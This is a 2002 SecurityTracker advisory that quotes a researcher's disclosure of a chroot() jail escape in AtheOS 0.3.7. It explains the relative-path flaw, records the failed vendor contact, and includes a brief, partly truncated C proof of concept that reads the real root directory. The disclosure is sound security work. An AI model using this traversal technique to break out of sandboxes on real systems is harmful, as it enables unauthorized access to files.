Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   OS (Other)  >   AtheOS Vendors:
AtheOS Operating System chroot() Function Lets Local Users Break Out and Access Files Outside of the Chroot Jail
SecurityTracker Alert ID:  1003500
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 10 2002
Impact:   Disclosure of system information, Disclosure of user information, Modification of system information, Modification of user information
Exploit Included:  Yes  
Version(s): 0.3.7, possibly other versions
Description:   A vulnerability was reported in the AtheOS desktop operating system. A local user can break out of a chroot() jail and access files on the system.

It is reported that a local user can break out of a chroot() jail. After a chroot() call on AtheOS, the base directory will become the '/' root directory for that user. However, it is reported that relative paths aren't checked against the current chroot jail. Because of this, a local user can use a file path such as '../../../../path/to/file' to obtain files located outside of the chroot limits.

Demonstration exploit code is provided in the Source Message.

Impact:   A local user in a chroot() jail can break out of the directory limits of the jail and access other files on the system.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Access control error

Message History:   None.

 Source Message Contents

Subject:  AtheOS: escaping from a chroot jail

                          -------( AtheOS )-------

  AtheOS is a free desktop operating system under the GPL license. AtheOS
currently run on Intel, AMD and other compatible processors and support the
Intel Multi Processor architecture.

  AtheOS home page is :
                       -------( Vulnerability )-------
  A chroot() call is implemented in AtheOS, and its behavior is supposed to
be POSIX conformant. Once chroot(<directory>) is issued by a process,
<directory> should become the base directory ('/') with no way to go out of
the jail. That feature is widely used to protect applications against
unwanted directory traversals (ftp, http, etc.) .

  After a chroot() call on AtheOS, '/' indeed seems to become the base
directory. '/path/to/file' is translated to '<directory>/path/to/file' .

  Unfortunately, relative paths aren't checked against the current chroot
jail. Therefore, '../../../../path/to/file' will be translated to a file out
of the chroot limits.
                     -------( Affected versions )-------
  Version 0.3.7 seems to be affected by that bug. I didn't check any prior
release, but they may be vulnerable as well.

                  -------( Simple proof of concept )-------

  The following code will read the content of the real '/' directory, while
'/tmp' is supposed to be the base of the chroot jail.

#include <stdio.h>
#include <unistd.h>
#include <dirent.h>

int main(void)
    register DIR *d;
    register const struct dirent *e;
    if (chdir("/") || chroot("/tmp") || chdir("/") ||
        (d = opendir("..")) == NULL) {
        return 1;
    while ((e = readdir(d)) != NULL) {
    return 0;

                    -------( Vendor notification )-------

  I reported the problem to the AtheOS maintainer <> on
January 2nd. The mail bounced (message id: on
January 10th.

  I sent back another mail to <> (message id : . The mail bounced on January 17th.

  I finally sent a mail to the AtheOS-Developer mailing-list. No one ever

                          -------( Impact )-------

  Don't trust chroot() on AtheOS. Users can traverse directories.

  Best regards,


 __  /*-      Frank DENIS (Jedi/Sector One) <j@42-Networks.Com>     -*\  __
 \ '/    <a href="http://www.PureFTPd.Org/"> Secure FTP Server </a>    \' /
  \/  <a href="http://www.Jedi.Claranet.Fr/"> Misc. free software </a>  \/


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC